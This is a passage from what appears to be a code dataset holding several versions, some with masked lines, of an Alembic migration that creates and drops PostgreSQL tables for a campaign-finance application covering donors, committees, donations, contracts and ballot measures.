nullable=True), sa.Column(\n 'election_id', postgresql.UUID(), nullable=True), sa.\n ForeignKeyConstraint(['election_id'], [u'election.id']), sa.\n PrimaryKeyConstraint('id'))\n op.create_index('ix_committee_election_id', 'committee', ['election_id'\n ], unique=False)\n op.create_table(u'ballot_measure', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=True), sa.Column('prop_id', sa.Text(), nullable=\n False), sa.Column('description', sa.Text(), nullable=True), sa.\n Column('num_yes', sa.Integer(), nullable=True), sa.Column('num_no',\n sa.Integer(), nullable=True), sa.Column('passed', sa.Boolean(),\n nullable=True), sa.Column('ballot_type_id', postgresql.UUID(),\n nullable=True), sa.Column('election_id', postgresql.UUID(),\n nullable=True), sa.ForeignKeyConstraint(['ballot_type_id'], [\n u'ballot_type.id']), sa.ForeignKeyConstraint(['election_id'], [\n u'election.id']), sa.PrimaryKeyConstraint('id'))\n op.create_index('ix_ballot_measure_election_id', 'ballot_measure', [\n 'election_id'], unique=False)\n op.create_index('ix_ballot_measure_ballot_type_id', 'ballot_measure', [\n 'ballot_type_id'], unique=False)\n op.create_table(u'donation', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('amount', sa.\n Float(), nullable=False), sa.Column('transaction_date', sa.Date(),\n nullable=False), sa.Column('donor_id', postgresql.UUID(), nullable=\n False), sa.Column('committee_id', postgresql.UUID(), nullable=False\n ), 
sa.ForeignKeyConstraint(['committee_id'], [u'committee.id']), sa\n .ForeignKeyConstraint(['donor_id'], [u'donor.id']), sa.\n PrimaryKeyConstraint('id'))\n op.create_index('ix_donation_committee_id', 'donation', ['committee_id'\n ], unique=False)\n op.create_index('ix_donation_donor_id', 'donation', ['donor_id'],\n unique=False)\n op.create_table(u'contract', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('payment', sa\n .Float(), nullable=False), sa.Column('consultant_id', postgresql.\n UUID(), nullable=False), sa.Column('service_id', postgresql.UUID(),\n nullable=True), sa.Column('description', sa.Text(), nullable=True),\n sa.Column('committee_id', postgresql.UUID(), nullable=False), sa.\n ForeignKeyConstraint(['committee_id'], [u'committee.id']), sa.\n ForeignKeyConstraint(['consultant_id'], [u'consultant.id']), sa.\n ForeignKeyConstraint(['service_id'], [u'service.id']), sa.\n PrimaryKeyConstraint('id'))\n op.create_index('ix_contract_consultant_id', 'contract', [\n 'consultant_id'], unique=False)\n op.create_index('ix_contract_service_id', 'contract', ['service_id'],\n unique=False)\n op.create_index('ix_contract_committee_id', 'contract', ['committee_id'\n ], unique=False)\n op.create_table(u'stance', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('voted_yes',\n sa.Boolean(), nullable=False), sa.Column('committee_id', postgresql\n .UUID(), nullable=False), sa.Column('ballot_measure_id', postgresql\n .UUID(), nullable=False), sa.ForeignKeyConstraint([\n 
'ballot_measure_id'], [u'ballot_measure.id']), sa.\n ForeignKeyConstraint(['committee_id'], [u'committee.id']), sa.\n PrimaryKeyConstraint('id'), sa.UniqueConstraint('committee_id',\n 'ballot_measure_id'))\n op.create_index('ix_stance_ballot_measure_id', 'stance', [\n 'ballot_measure_id'], unique=False)\n op.create_index('ix_stance_committee_id', 'stance', ['committee_id'],\n unique=False)\n op.create_table(u'ballot_measure_tags', sa.Column('id', postgresql.UUID\n (), server_default=func.uuid_generate_v4(), nullable=False), sa.\n Column('created', sa.DateTime(timezone=True), server_default=func.\n now(), nullable=False), sa.Column('updated', sa.DateTime(timezone=\n True), server_default=func.now(), nullable=False), sa.Column(\n 'ballot_measure_id', postgresql.UUID(), nullable=False), sa.Column(\n 'tag_id', postgresql.UUID(), nullable=False), sa.\n ForeignKeyConstraint(['ballot_measure_id'], [u'ballot_measure.id']),\n sa.ForeignKeyConstraint(['tag_id'], [u'tag.id']), sa.\n PrimaryKeyConstraint('id'), sa.UniqueConstraint('ballot_measure_id',\n 'tag_id'))\n op.create_index('ix_ballot_measure_tags_tag_id', 'ballot_measure_tags',\n ['tag_id'], unique=False)\n op.create_index('ix_ballot_measure_tags_ballot_measure_id',\n 'ballot_measure_tags', ['ballot_measure_id'], unique=False)\n\n\ndef downgrade():\n op.drop_index('ix_ballot_measure_tags_ballot_measure_id',\n 'ballot_measure_tags')\n op.drop_index('ix_ballot_measure_tags_tag_id', 'ballot_measure_tags')\n op.drop_table(u'ballot_measure_tags')\n op.drop_index('ix_stance_committee_id', 'stance')\n op.drop_index('ix_stance_ballot_measure_id', 'stance')\n op.drop_table(u'stance')\n op.drop_index('ix_contract_committee_id', 'contract')\n op.drop_index('ix_contract_service_id', 'contract')\n op.drop_index('ix_contract_consultant_id', 'contract')\n op.drop_table(u'contract')\n op.drop_index('ix_donation_donor_id', 'donation')\n op.drop_index('ix_donation_committee_id', 'donation')\n op.drop_table(u'donation')\n 
op.drop_index('ix_ballot_measure_ballot_type_id', 'ballot_measure')\n op.drop_index('ix_ballot_measure_election_id', 'ballot_measure')\n op.drop_table(u'ballot_measure')\n op.drop_index('ix_committee_election_id', 'committee')\n op.drop_table(u'committee')\n op.drop_index('ix_donor_employer_id', 'donor')\n op.drop_table(u'donor')\n op.drop_table(u'election')\n op.drop_table(u'tag')\n op.drop_table(u'employer')\n op.drop_table(u'ballot_type')\n op.drop_table(u'service')\n op.drop_table(u'consultant')\n",
"step-3": "<mask token>\nrevision = '1f2296edbc75'\ndown_revision = '7417382a3f1'\n<mask token>\n\n\ndef upgrade():\n op.create_table(u'consultant', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('address', sa.Text(), nullable=\n True), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'service', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('description', sa.Text(),\n nullable=True), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'ballot_type', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('percent_required', sa.Numeric(\n precision=2, scale=2), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'employer', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'tag', sa.Column('id', postgresql.UUID(),\n 
server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'election', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('date', sa.\n Date(), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'donor', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('first_name',\n sa.Text(), nullable=False), sa.Column('last_name', sa.Text(),\n nullable=False), sa.Column('address', sa.Text(), nullable=False),\n sa.Column('latitude', sa.Float(), nullable=False), sa.Column(\n 'longitude', sa.Float(), nullable=False), sa.Column('employer_id',\n postgresql.UUID(), nullable=True), sa.ForeignKeyConstraint([\n 'employer_id'], [u'employer.id']), sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('first_name', 'last_name', 'latitude', 'longitude')\n )\n op.create_index('ix_donor_employer_id', 'donor', ['employer_id'],\n unique=False)\n op.create_table(u'committee', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), 
sa.Column('filer_id', sa.Text(), nullable=\n True), sa.Column('sponsor', sa.Text(), nullable=True), sa.Column(\n 'election_id', postgresql.UUID(), nullable=True), sa.\n ForeignKeyConstraint(['election_id'], [u'election.id']), sa.\n PrimaryKeyConstraint('id'))\n op.create_index('ix_committee_election_id', 'committee', ['election_id'\n ], unique=False)\n op.create_table(u'ballot_measure', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=True), sa.Column('prop_id', sa.Text(), nullable=\n False), sa.Column('description', sa.Text(), nullable=True), sa.\n Column('num_yes', sa.Integer(), nullable=True), sa.Column('num_no',\n sa.Integer(), nullable=True), sa.Column('passed', sa.Boolean(),\n nullable=True), sa.Column('ballot_type_id', postgresql.UUID(),\n nullable=True), sa.Column('election_id', postgresql.UUID(),\n nullable=True), sa.ForeignKeyConstraint(['ballot_type_id'], [\n u'ballot_type.id']), sa.ForeignKeyConstraint(['election_id'], [\n u'election.id']), sa.PrimaryKeyConstraint('id'))\n op.create_index('ix_ballot_measure_election_id', 'ballot_measure', [\n 'election_id'], unique=False)\n op.create_index('ix_ballot_measure_ballot_type_id', 'ballot_measure', [\n 'ballot_type_id'], unique=False)\n op.create_table(u'donation', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('amount', sa.\n Float(), nullable=False), sa.Column('transaction_date', sa.Date(),\n nullable=False), sa.Column('donor_id', postgresql.UUID(), nullable=\n False), 
sa.Column('committee_id', postgresql.UUID(), nullable=False\n ), sa.ForeignKeyConstraint(['committee_id'], [u'committee.id']), sa\n .ForeignKeyConstraint(['donor_id'], [u'donor.id']), sa.\n PrimaryKeyConstraint('id'))\n op.create_index('ix_donation_committee_id', 'donation', ['committee_id'\n ], unique=False)\n op.create_index('ix_donation_donor_id', 'donation', ['donor_id'],\n unique=False)\n op.create_table(u'contract', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('payment', sa\n .Float(), nullable=False), sa.Column('consultant_id', postgresql.\n UUID(), nullable=False), sa.Column('service_id', postgresql.UUID(),\n nullable=True), sa.Column('description', sa.Text(), nullable=True),\n sa.Column('committee_id', postgresql.UUID(), nullable=False), sa.\n ForeignKeyConstraint(['committee_id'], [u'committee.id']), sa.\n ForeignKeyConstraint(['consultant_id'], [u'consultant.id']), sa.\n ForeignKeyConstraint(['service_id'], [u'service.id']), sa.\n PrimaryKeyConstraint('id'))\n op.create_index('ix_contract_consultant_id', 'contract', [\n 'consultant_id'], unique=False)\n op.create_index('ix_contract_service_id', 'contract', ['service_id'],\n unique=False)\n op.create_index('ix_contract_committee_id', 'contract', ['committee_id'\n ], unique=False)\n op.create_table(u'stance', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('voted_yes',\n sa.Boolean(), nullable=False), sa.Column('committee_id', postgresql\n .UUID(), nullable=False), sa.Column('ballot_measure_id', postgresql\n 
.UUID(), nullable=False), sa.ForeignKeyConstraint([\n 'ballot_measure_id'], [u'ballot_measure.id']), sa.\n ForeignKeyConstraint(['committee_id'], [u'committee.id']), sa.\n PrimaryKeyConstraint('id'), sa.UniqueConstraint('committee_id',\n 'ballot_measure_id'))\n op.create_index('ix_stance_ballot_measure_id', 'stance', [\n 'ballot_measure_id'], unique=False)\n op.create_index('ix_stance_committee_id', 'stance', ['committee_id'],\n unique=False)\n op.create_table(u'ballot_measure_tags', sa.Column('id', postgresql.UUID\n (), server_default=func.uuid_generate_v4(), nullable=False), sa.\n Column('created', sa.DateTime(timezone=True), server_default=func.\n now(), nullable=False), sa.Column('updated', sa.DateTime(timezone=\n True), server_default=func.now(), nullable=False), sa.Column(\n 'ballot_measure_id', postgresql.UUID(), nullable=False), sa.Column(\n 'tag_id', postgresql.UUID(), nullable=False), sa.\n ForeignKeyConstraint(['ballot_measure_id'], [u'ballot_measure.id']),\n sa.ForeignKeyConstraint(['tag_id'], [u'tag.id']), sa.\n PrimaryKeyConstraint('id'), sa.UniqueConstraint('ballot_measure_id',\n 'tag_id'))\n op.create_index('ix_ballot_measure_tags_tag_id', 'ballot_measure_tags',\n ['tag_id'], unique=False)\n op.create_index('ix_ballot_measure_tags_ballot_measure_id',\n 'ballot_measure_tags', ['ballot_measure_id'], unique=False)\n\n\ndef downgrade():\n op.drop_index('ix_ballot_measure_tags_ballot_measure_id',\n 'ballot_measure_tags')\n op.drop_index('ix_ballot_measure_tags_tag_id', 'ballot_measure_tags')\n op.drop_table(u'ballot_measure_tags')\n op.drop_index('ix_stance_committee_id', 'stance')\n op.drop_index('ix_stance_ballot_measure_id', 'stance')\n op.drop_table(u'stance')\n op.drop_index('ix_contract_committee_id', 'contract')\n op.drop_index('ix_contract_service_id', 'contract')\n op.drop_index('ix_contract_consultant_id', 'contract')\n op.drop_table(u'contract')\n op.drop_index('ix_donation_donor_id', 'donation')\n op.drop_index('ix_donation_committee_id', 
'donation')\n op.drop_table(u'donation')\n op.drop_index('ix_ballot_measure_ballot_type_id', 'ballot_measure')\n op.drop_index('ix_ballot_measure_election_id', 'ballot_measure')\n op.drop_table(u'ballot_measure')\n op.drop_index('ix_committee_election_id', 'committee')\n op.drop_table(u'committee')\n op.drop_index('ix_donor_employer_id', 'donor')\n op.drop_table(u'donor')\n op.drop_table(u'election')\n op.drop_table(u'tag')\n op.drop_table(u'employer')\n op.drop_table(u'ballot_type')\n op.drop_table(u'service')\n op.drop_table(u'consultant')\n",
"step-4": "<mask token>\nrevision = '1f2296edbc75'\ndown_revision = '7417382a3f1'\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\nfrom sqlalchemy import func\n\n\ndef upgrade():\n op.create_table(u'consultant', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('address', sa.Text(), nullable=\n True), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'service', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('description', sa.Text(),\n nullable=True), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'ballot_type', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('percent_required', sa.Numeric(\n precision=2, scale=2), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'employer', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), 
sa.PrimaryKeyConstraint('id'))\n op.create_table(u'tag', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'election', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('date', sa.\n Date(), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'donor', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('first_name',\n sa.Text(), nullable=False), sa.Column('last_name', sa.Text(),\n nullable=False), sa.Column('address', sa.Text(), nullable=False),\n sa.Column('latitude', sa.Float(), nullable=False), sa.Column(\n 'longitude', sa.Float(), nullable=False), sa.Column('employer_id',\n postgresql.UUID(), nullable=True), sa.ForeignKeyConstraint([\n 'employer_id'], [u'employer.id']), sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('first_name', 'last_name', 'latitude', 'longitude')\n )\n op.create_index('ix_donor_employer_id', 'donor', ['employer_id'],\n unique=False)\n op.create_table(u'committee', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n 
server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('filer_id', sa.Text(), nullable=\n True), sa.Column('sponsor', sa.Text(), nullable=True), sa.Column(\n 'election_id', postgresql.UUID(), nullable=True), sa.\n ForeignKeyConstraint(['election_id'], [u'election.id']), sa.\n PrimaryKeyConstraint('id'))\n op.create_index('ix_committee_election_id', 'committee', ['election_id'\n ], unique=False)\n op.create_table(u'ballot_measure', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=True), sa.Column('prop_id', sa.Text(), nullable=\n False), sa.Column('description', sa.Text(), nullable=True), sa.\n Column('num_yes', sa.Integer(), nullable=True), sa.Column('num_no',\n sa.Integer(), nullable=True), sa.Column('passed', sa.Boolean(),\n nullable=True), sa.Column('ballot_type_id', postgresql.UUID(),\n nullable=True), sa.Column('election_id', postgresql.UUID(),\n nullable=True), sa.ForeignKeyConstraint(['ballot_type_id'], [\n u'ballot_type.id']), sa.ForeignKeyConstraint(['election_id'], [\n u'election.id']), sa.PrimaryKeyConstraint('id'))\n op.create_index('ix_ballot_measure_election_id', 'ballot_measure', [\n 'election_id'], unique=False)\n op.create_index('ix_ballot_measure_ballot_type_id', 'ballot_measure', [\n 'ballot_type_id'], unique=False)\n op.create_table(u'donation', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('amount', sa.\n Float(), nullable=False), sa.Column('transaction_date', sa.Date(),\n 
nullable=False), sa.Column('donor_id', postgresql.UUID(), nullable=\n False), sa.Column('committee_id', postgresql.UUID(), nullable=False\n ), sa.ForeignKeyConstraint(['committee_id'], [u'committee.id']), sa\n .ForeignKeyConstraint(['donor_id'], [u'donor.id']), sa.\n PrimaryKeyConstraint('id'))\n op.create_index('ix_donation_committee_id', 'donation', ['committee_id'\n ], unique=False)\n op.create_index('ix_donation_donor_id', 'donation', ['donor_id'],\n unique=False)\n op.create_table(u'contract', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('payment', sa\n .Float(), nullable=False), sa.Column('consultant_id', postgresql.\n UUID(), nullable=False), sa.Column('service_id', postgresql.UUID(),\n nullable=True), sa.Column('description', sa.Text(), nullable=True),\n sa.Column('committee_id', postgresql.UUID(), nullable=False), sa.\n ForeignKeyConstraint(['committee_id'], [u'committee.id']), sa.\n ForeignKeyConstraint(['consultant_id'], [u'consultant.id']), sa.\n ForeignKeyConstraint(['service_id'], [u'service.id']), sa.\n PrimaryKeyConstraint('id'))\n op.create_index('ix_contract_consultant_id', 'contract', [\n 'consultant_id'], unique=False)\n op.create_index('ix_contract_service_id', 'contract', ['service_id'],\n unique=False)\n op.create_index('ix_contract_committee_id', 'contract', ['committee_id'\n ], unique=False)\n op.create_table(u'stance', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('voted_yes',\n sa.Boolean(), nullable=False), sa.Column('committee_id', 
postgresql\n .UUID(), nullable=False), sa.Column('ballot_measure_id', postgresql\n .UUID(), nullable=False), sa.ForeignKeyConstraint([\n 'ballot_measure_id'], [u'ballot_measure.id']), sa.\n ForeignKeyConstraint(['committee_id'], [u'committee.id']), sa.\n PrimaryKeyConstraint('id'), sa.UniqueConstraint('committee_id',\n 'ballot_measure_id'))\n op.create_index('ix_stance_ballot_measure_id', 'stance', [\n 'ballot_measure_id'], unique=False)\n op.create_index('ix_stance_committee_id', 'stance', ['committee_id'],\n unique=False)\n op.create_table(u'ballot_measure_tags', sa.Column('id', postgresql.UUID\n (), server_default=func.uuid_generate_v4(), nullable=False), sa.\n Column('created', sa.DateTime(timezone=True), server_default=func.\n now(), nullable=False), sa.Column('updated', sa.DateTime(timezone=\n True), server_default=func.now(), nullable=False), sa.Column(\n 'ballot_measure_id', postgresql.UUID(), nullable=False), sa.Column(\n 'tag_id', postgresql.UUID(), nullable=False), sa.\n ForeignKeyConstraint(['ballot_measure_id'], [u'ballot_measure.id']),\n sa.ForeignKeyConstraint(['tag_id'], [u'tag.id']), sa.\n PrimaryKeyConstraint('id'), sa.UniqueConstraint('ballot_measure_id',\n 'tag_id'))\n op.create_index('ix_ballot_measure_tags_tag_id', 'ballot_measure_tags',\n ['tag_id'], unique=False)\n op.create_index('ix_ballot_measure_tags_ballot_measure_id',\n 'ballot_measure_tags', ['ballot_measure_id'], unique=False)\n\n\ndef downgrade():\n op.drop_index('ix_ballot_measure_tags_ballot_measure_id',\n 'ballot_measure_tags')\n op.drop_index('ix_ballot_measure_tags_tag_id', 'ballot_measure_tags')\n op.drop_table(u'ballot_measure_tags')\n op.drop_index('ix_stance_committee_id', 'stance')\n op.drop_index('ix_stance_ballot_measure_id', 'stance')\n op.drop_table(u'stance')\n op.drop_index('ix_contract_committee_id', 'contract')\n op.drop_index('ix_contract_service_id', 'contract')\n op.drop_index('ix_contract_consultant_id', 'contract')\n op.drop_table(u'contract')\n 
op.drop_index('ix_donation_donor_id', 'donation')\n op.drop_index('ix_donation_committee_id', 'donation')\n op.drop_table(u'donation')\n op.drop_index('ix_ballot_measure_ballot_type_id', 'ballot_measure')\n op.drop_index('ix_ballot_measure_election_id', 'ballot_measure')\n op.drop_table(u'ballot_measure')\n op.drop_index('ix_committee_election_id', 'committee')\n op.drop_table(u'committee')\n op.drop_index('ix_donor_employer_id', 'donor')\n op.drop_table(u'donor')\n op.drop_table(u'election')\n op.drop_table(u'tag')\n op.drop_table(u'employer')\n op.drop_table(u'ballot_type')\n op.drop_table(u'service')\n op.drop_table(u'consultant')\n",
"step-5": "\"\"\"Initial migration\n\nRevision ID: 1f2296edbc75\nRevises: 7417382a3f1\nCreate Date: 2014-01-19 23:04:58.877817\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '1f2296edbc75'\ndown_revision = '7417382a3f1'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\nfrom sqlalchemy import func\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table(u'consultant',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('name', sa.Text(), nullable=False),\n sa.Column('address', sa.Text(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table(u'service',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('name', sa.Text(), nullable=False),\n sa.Column('description', sa.Text(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table(u'ballot_type',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('name', sa.Text(), nullable=False),\n sa.Column('percent_required', sa.Numeric(precision=2, scale=2), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table(u'employer',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', 
sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('name', sa.Text(), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table(u'tag',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('name', sa.Text(), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table(u'election',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('date', sa.Date(), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table(u'donor',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('first_name', sa.Text(), nullable=False),\n sa.Column('last_name', sa.Text(), nullable=False),\n sa.Column('address', sa.Text(), nullable=False),\n sa.Column('latitude', sa.Float(), nullable=False),\n sa.Column('longitude', sa.Float(), nullable=False),\n sa.Column('employer_id', postgresql.UUID(), nullable=True),\n sa.ForeignKeyConstraint(['employer_id'], [u'employer.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('first_name','last_name','latitude','longitude')\n )\n op.create_index('ix_donor_employer_id', 'donor', ['employer_id'], unique=False)\n op.create_table(u'committee',\n sa.Column('id', 
